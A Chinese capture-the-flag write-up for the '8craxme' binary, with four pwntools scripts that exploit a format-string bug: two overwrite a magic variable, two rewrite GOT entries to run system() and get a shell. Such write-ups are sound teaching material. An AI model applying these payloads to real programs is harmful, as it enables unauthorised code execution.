check一下,开了NX和canary
拖进ida,发现格式化字符串漏洞,并且有两个flag,只要我们控制magic等于218 或者-87117812就行
image.png
先测试一下格式化字符串的位置,发现偏移为7
image.png
修改magic
脚本一,改为218
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
context.log_level = 'debug'
p = process('./8craxme')
magic = 0x0804A038
payload = ""
payload += p32(magic) + "%0214c" + "%7$n"
#payload2 = fmtstr_payload(7,{magic:218})
p.sendline(payload)
p.recv()
p.interactive()
脚本二,改为-87117812,即为0xFACEB00C,因为占了四位,所以需要分四次写入
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
context.log_level = 'debug'
p = process('./8craxme')
magic = 0x0804A038
payload = ""
payload += p32(magic) + p32(magic+1) + p32(magic+2) + p32(magic+3)
payload += (0x10c- 16)*'a' + "%7$n"
payload += (0x1b0 - 0x10c)*'b' + "%8$n"
payload += (0x1ce - 0x1b0)*'c' + "%9$n"
payload += (0x1fa - 0x1ce)*'d' + "%10$n"
# payload2 = fmtstr_payload(7,{magic:0xFACEB00C})
p.sendline(payload)
p.recv()
p.interactive()
方法三:
修改puts的got表为执行system("cat /home/craxme/flag")的地址,这样一来在执行到puts("You need be a phd")的时候会直接去执行system("cat /home/craxme/flag")
脚本:
#!/usr/bin/env python
#-*-coding:utf-8-*-
from pwn import *
p = process('./8craxme')
elf = ELF('./8craxme')
puts_got = elf.got['puts']
system_catflag = 0x80485F3
payload = fmtstr_payload(7,{puts_got:system_catflag})
p.sendline(payload)
p.interactive()
方法四:参考大佬https://www.jianshu.com/p/460a3323486f
修改puts的got表改到main中read的上面,把printf的got表改成system的plt表地址,这样就可以直接拿到shell了??(其实不是很懂)难道是执行put的时候,转到read函数,执行完read函数后,执行下面的printf函数时,调用system?
脚本:
#!/usr/bin/env python
#-*-coding:utf-8-*-
from pwn import *
p = process('./8craxme')
elf = ELF('./8craxme')
puts_got = elf.got['puts']
printf_got = elf.got['printf']
system_plt = elf.plt['system']
read_up = 0x80485A1
payload = fmtstr_payload(7,{puts_got:read_up,printf_got:system_plt})
p.sendline(payload)
#p.sendline('/bin/sh\x00')
p.interactive()
